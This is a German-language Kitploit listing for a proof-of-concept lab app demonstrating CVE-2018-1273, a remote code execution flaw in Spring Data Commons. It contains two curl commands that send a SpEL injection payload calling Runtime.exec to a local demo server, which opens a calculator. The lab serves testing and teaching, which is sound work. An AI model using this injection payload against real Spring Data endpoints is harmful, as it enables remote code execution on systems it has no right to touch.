Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
poc-cve-2018-1273 — PoC für CVE-2018-1273 | Kitploit
Tools/GitHubGitHub/wearearima/poc-cve-2018-1273
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubwearearima/poc-cve-2018-1273

poc-cve-2018-1273

PoC für CVE-2018-1273

Repository anzeigen
2410vor 8 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-1273

Spring Data Commons, Versionen vor 1.13 bis 1.13.10, 2.0 bis 2.0.5 sowie ältere, nicht unterstützte Versionen, enthalten eine Property-Binder-Sicherheitslücke, die durch unsachgemäße Neutralisierung spezieller Elemente verursacht wird. Ein nicht authentifizierter, entfernter böswilliger Benutzer (oder Angreifer) kann speziell gestaltete Request-Parameter gegen Spring Data REST-gestützte HTTP-Ressourcen liefern oder die projektionsbasierte Request-Payload-Bindung von Spring Data verwenden, was zu einer Remote-Code-Ausführung führen kann.

Weitere Informationen hier

Ausführung

Die Anwendung kann mit der anfälligen Version oder der korrigierten Version von Spring Data Commons getestet werden.

  • Anfällige Version (standardmäßig):
root@kitploit:~
mvn spring-boot:run
  • Korrigierte Version:
root@kitploit:~
mvn spring-boot:run -Dfixed

Testen der Sicherheitslücke

Führen Sie den folgenden Befehl aus, um zu prüfen, ob die Sicherheitslücke ausgenutzt werden kann:

  • Auf Windows:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"

  • Auf macOS:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"

Credits

Erstellt von https://www.arima.eu

ARIMA Software Design

Tool herunterladen